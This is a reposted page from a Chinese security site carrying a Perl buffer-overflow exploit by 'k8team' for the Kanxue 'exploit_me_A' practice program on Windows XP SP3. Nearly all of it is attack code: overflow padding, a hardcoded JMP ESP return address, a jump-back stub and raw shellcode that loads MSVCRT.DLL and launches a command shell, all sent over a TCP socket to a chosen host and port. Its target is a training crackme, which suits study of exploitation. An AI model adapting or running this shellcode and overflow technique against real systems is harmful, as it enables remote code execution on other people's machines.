频道栏目
首页 > 程序开发 > 综合编程 > 安全编程 > 正文
[溢出]Perl 看雪exploit_me_A exploit by k8team
2013-12-30 23:51:21         来源:K8拉登哥哥‘s Blog  
收藏   我要投稿
#!/usr/bin/perl
# Perl exploit_me_A  exploit by k8team
# Date: 20131018
# Tested on: XPSP3

if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; }
use IO::Socket::INET;

my $JMPESP = "\x12\x45\xFA\x7F";
my $JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";

#shellcode cmd  XP SP3
my $shellcode =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50" .
"\xC6\x45\xF4\x4D" .
"\xC6\x45\xF5\x53" .    
"\xC6\x45\xF6\x56" .    
"\xC6\x45\xF7\x43" .
"\xC6\x45\xF8\x52" .
"\xC6\x45\xF9\x54" .
"\xC6\x45\xFA\x2E" .
"\xC6\x45\xFB\x44" .
"\xC6\x45\xFC\x4C" .
"\xC6\x45\xFD\x4C" .
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2" .
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D" .
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E" .    
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22" .
"\x89\x45\xFC\x33\xD2\x88\x55\xFF" .
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";

#字符串 单引号 和双引号的区别
#"双引号" "\x41" 会转义 成A
#单引号 '\x41' 不会转义 直接输出\x41 这样就4个字节了
#my $a = '\x41' x 190 . "123456AAA2"; #    
my $a = "\x41" x 190 . "123456AAA2";

my $payload = $a . $JMPESP . $shellcode;

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable toconnect!\n";

#print $payload;

sleep 1;
print $sock $payload;
print "Exploiting\n";
sleep 2;
print "Done\n";
点击复制链接 与好友分享!回本站首页
上一篇:[溢出]delphi overflow demo delphi缓冲区溢出例子+源码
下一篇:[溢出]python 看雪exploit_me_A overflow exploit by k8team
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站